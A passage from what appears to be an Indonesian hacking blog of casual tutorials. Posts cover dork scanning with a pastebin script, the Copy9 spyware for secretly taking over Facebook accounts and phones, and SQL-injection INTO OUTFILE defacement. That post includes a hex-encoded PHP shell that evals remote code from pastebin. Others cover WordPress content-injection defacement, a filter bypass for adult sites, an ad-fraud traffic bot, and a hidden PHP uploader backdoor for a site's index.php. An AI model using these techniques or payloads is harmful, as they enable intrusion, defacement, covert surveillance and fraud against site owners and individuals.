WHAT'S NEW?
Loading...
Cara Dorking Cepat
Menggunakan Tool Kali Linux


Assalamualaikum.. hallo selamat siang:).. kalian sudah bosen dork digoogle? Ngedork 2jam tpi gk ada hasil? Xixixi:V".. Kali ini gw mau kasih cara dorking dikali Linux .. sebenernya nih cara udh ada dari 2018 san.. tpi gw baru paham skrng:V".. kwkwkwkwkwk langsung aja simak ..

Bahan :
- Linux OS ( Ubuntu, kali, Parrot dll)
- Internet 
- Ketampanan WAJIB :v"...

Langkah - langkah :
Buka terminal kemudian masukan perintah :

$ root@kali:~# apt-get update && apt-get upgrade
$ root@kali:~# apt-get install wget curl ruby dos2unix
$ root@kali:~# mkdir scanchan && cd scanchan 
S root@kali:~# wget https://pastebin.com/raw/7C6M4bJa -O scanchan.sh 
$ root@kali:~# chmod 777 scanchan.sh Convers script scanhan.sh with dos2unix 
$ root@kali:~# dos2unix scanhan.sh


Lah kalaw sudah semuanya terinstall tinggal jalaninnya.. caranya? 

$ root@kali:~# ./scachan.sh 
$ Masukan Dork
$ Masukan Nomer id (nih gw ngedork sql)

NB : law hijau vuln.. law merah gk vuln .. seperti gambar di atas..

Sekian dulu dari gw.. thanks you jangan lupa 
#share & coment

Sumber Tools
Hack Facebook
Dengan Aplikasi Copy9


Copy9 adalah salah satu tool paling efisien untuk hack akun facebook. Dengan software kecil yang bagus ini lu semua dapat memperoleh akses dari akun seseorang dan memeriksa semuanya.
Salah satu fitur terbaik dari  tool hack facebook  ini adalah benar-benar tidak dapat dilacak dan tidak terdeteksi.
lu semua juga dapat melacak telepon pengguna yang ditargetkan dari jarak jauh tanpa mereka mengetahui bahwa mereka dimata-matai.

Jika lu baru belajar tentang cara hack akun facebook. maka lu harus tahu bahwa tidak ada tool yang lebih baik untuk melakukannya daripada copy9.
Tool ini sangat sederhana dan mudah digunakan. Hanya perlu beberapa langkah sebelum elu dapat memulai.

Hal pertama yang perlu lu lakukan adalah mengunduh Aplikasi Copy9 Disini Oy. Kemudian instal, 
buat akun pribadi di situs web mereka dan elu siap untuk pergi lihat Data yang Dipantau melalui my.copy9.com.
lu dapat melacak pesan facebook tanpa masalah..

Kesederhanaan adalah salah satu fitur terbaiknya, karena lu tidak harus menjadi hacker yang terampil untuk menggunakannya.
lu hanya dapat mengendalikan ponsel apa pun melalui dasbor yang web copy9. Cukup masuk ke akun elu dan lu akan disajikan dengan semua informasi mengenai akun facebook pengguna yang ditargetkan.

Di antara hal-hal hebat lainnya yang dimiliki tool ini, lu harus tahu bahwa copy9 hadir dengan lebih dari 25 fitur hebat lainnya, mulai dari pelacakan GPS hingga pemantauan panggilan.
Seperti yg gw sebutkan, sangat mudah digunakan dan gratis untuk dicoba, jadi manfaatkan itu dan pelajari cara hack akun facebook dengan cepat.
Dengan  hacking Facebook seperti copy9, lu gak akan pernah mengalami masalah untuk mendapatkan akses ke akun seseorang

Cara Deface Website
 Menggunakan
Teknik Into Outfile



Kali ini gw mau kasih cara deface dengan teknik into outfile.. Into outfile sendiri artinya kita langsng up shell pada sebuah website tanpa harus menjadi admin dari web tersebut.. Gw juga akan kasih live targetnya.. Biar gk kelamaan langsng aja..

Live target :

Langkah pertama untuk mengecek vuln sql auto tidak pada sebuah website ktta beri tanda string (').. 


Vuln gan.. Kemudian kita simpan tulisan C:\xampp\htdocs\portal_bpkpad\pages\single_page.php on line 149 dicatatan buat penempatan shell backdoor kita difinalnya:V"..

Next selanjutnya kembali ketarget kita


Disini kita cari angka cantiknya dulu ya
Klo masih eror berarti kita harus cari angkanya lg klo gak eror berarti itu lah angka cantiknya..

Trus cara mencari angka cantiknya bgaimana caranya? 

Kita tambahkan +order+by+angkacantik--+

Contoh target kita 


Kalaw masih seperti itu cari lagi sampe gk error.. 


Lahh kalaw sudah kembali seperti semula berarti itu angka cantiknya.. 

Trus klo kita udh dapat angka cantiknya, selanjutnya 
Kita ganti yg +order+by+
Dengan +union+select+
Dan tambahkan angka dari 1 sampai angka cantiknya
Contoh


Kemudian kita tambahkan minus (-) diblkang id= contoh seperti digambar, fungsinya kita cari angka string user



Next selanjutnya kita cek usernya
Klo usernya root local berarti bisa di sql

Trus caranya bagaimana? 
Kita ganti angka string usernya yg tadi angka 4 dengan user().. Liat gambar dibawah



Next selanjutnya kita cek lg permissonnya
Klo Y berarti bisa di sql
Klo N berarti tidak bisa disql

Trus caranya bagaimana?

Tinggal kita ganti lg yg user() menjadi file_priv

Berarti seperti ini

Trus tambahkan lg setelah angka cantik +from+mysql.user

Seperti ini

Maka disitu lah jawabannya bisa atau tidaknya..
Klo jawabanya Y berarti bisa disql. Kalaw N berarti tidak bisa ok..


Krna target kita jawabannya Y berarti bisa disql

Next selanjutnya kita hapus lg, kita kembalikan lg kesemula target kita
Seperti ini

Lalu kita tambahkan kode hexa shell atau uploader kita diangka string user

Ini angka hexa shell mini gw

0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f69514462764a65752229293b3f3e

Jadi seperti ini



Next selanjutnya kita tambahkan +INTO+OUTFILE'(Dir in yg tadi gw suruh simpan dinote)/namashell.php'

Contoh:
+INTO+OUTFILE'C:\xampp\htdocs\portal_bpkpad\pages/FALKA.php'

And jngan lupa kita ubah stringnya dari ini \ menjadi /

Mka akan seperti ini:
+INTO+OUTFILE'C:/xampp/htdocs/portal_bpkpad/pages/FALKA.php'

Kita tambahkan setelah angka cantik tadi 


Nah klo sudah tinggal kita masuk ke dirnya targetnya ajj deh



Lahh udh ketanem shellnya.. Kalaw udh gitu you know lah tinggal apa:V"..



Kwkwkkwkkkw.. Susah? Yah emng gan.. Pkoknya banyak" baca + praktek..
Thanks.. See You In Next Post
#Share and coment

Cara Deface Wp Content Auto
Sql Injection


Maap gw lama gk post tutorial.. Soalnya lagi ada masalah real life gan:V".. Skrng gw mau kasih tutorial deface auto sql injection.. Digoogle ataupun blog lain deface metode ini menggunakan laptop + tools yg biasanya pke bahasa pemrogaman ruby.. Tpi tenang gw ada caranya yg lebih gampang tanpa menggunakan laptop dan bisa dicoba dihp android agan masing":V"... Lngsng aja bahan nya :

1. Termux
2. Script Tools Chmod Disini
3. Kouta internet
4. Dork : inurl:/wp-includes/rest-api/
5. Exploit : mangsa.com/wp-json/wp/v2/posts


Kita dork digoogle dulu seperti biasa..


Masukan exploit kalaw vuln cirinya kek gambar dibawah..


Kalaw kek gitu tinggl eksekusi aja.. Buka script toolsnya tdi trs agan edit" aja dulu hacked by nya:V"...


Kalaw sudah edit" langsng meluncur ke termux.. Jalankan toolsnya.. Trs langsng taruh target agan



Dan kita liat hasilnya..


Done gan:V"... Btw mayan push rank mirror hackersid loh..
Thankss udh baca akhir..
#share and coment
Membuka Situs Dewasa
Menggunakan Google Translate


Yokay Stah.. Bagi Kalian Yg Suka Liat Video Dewasa Namun Terhalang Internet Positif, Gw Mau Kasih Cara Yang Ampuh Banget.. Tanpa VPN Tanpa Aplikasi Apapun Dijamin Work 100%:V".. Simak Aja :

1. Kalian buka google chrome kalian
2. Kalian ketik "google translate" lalu klik website nya yg "translate.google.com"..



3. Kalian ketik website dewasa yg ingin kalian buka.. Kemudian klik bagian yg gw lingkari


4. Selamat Menikmati.. Tanpa VPN yg membuat hp kalian lemot dan berat cara ini lebih efisien dan cepat :V"..


Mantapp bukan??:V".. Jangan dishare ke anak dibawah umur gan.. Dosa tau
#Thanks
Cara Mudah Menambah 
Visitor Blog/web Sehari 10000


Yosh balik lagi ama gw FALKA gans.. Bagi kalian yg pingin punya visitor banyak namun konten kalian gak jelas dan sepi kunjungan cara ini mungkin ampuh banget.. Dan jika kalian daftar adsense namun gk diacc cara ini juga dapat membuat blog kalian langsung diacc ama adsense:V" kalaw beruntung sih :B".. Pkoknya kalian harus ikthiar dan tawakal mheuwhuuwhuhe.. Cekidot langsung aja..

Bahan tempurnya :

- Termux
- Script Toolsnya Disini
- Kouta Lancar

Pertama kalian download dulu aplikasi termuxnya diplaystore..

Kedua kalian download scriptnya juga.. Ekstrak dan taruh scriptnya dipenyimpanan telefon..

Ketiga tinggal jalani satu-satu aja commandnya..
1. $cd /sdcard/Avisit
2. $pip install -r requirements.txt
3. $pip install requests
4. $python avisit.py

Keempat masukan url blog kalian dan tunggu hasilnya :V".. 




Mantap Bukan?? Kalaw kurang paham chat wa gw aja lngsng.. Terima kasih
#See You In Next Post
#Share And Coment 
Hidden Uploader
Script PHP


Yosh dimalem taun baru ini gw mau kasih tutorial cara membuat hidden uploader.. Keuntungan pke hidden uploader adalah akses kita gak gampang ketikung alias kehapus:V".. Ok lngsng aja simak :

Copas Script nya dulu ;

<?php
if(isset($_GET["uploader"]))
 {
  echo"<font color=#ffffff>".php_uname()."";
  print "\n";$disable_functions = @ini_get("disable_functions"); 
  echo "<br>DisablePHP=".$disable_functions; print "\n"; 
  echo"<br><form method=post enctype=multipart/form-data>"; 
  echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; 
    if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal upload cok";
}
}

Kemudian tempel script nya dibagian file "index.php" atau apalah.. Kemudian cara aksesnya "http://webnya.cuk/?uploader" kalaw kalian sisipkan difile lain bkn diindexnya yah tinggal "http://webnya.cuk/filekalian?uploader"



Sampai sini dulu gw.. Selamat mencoba dan selamat tahun baru..
#happy new years
#happy hacking deface page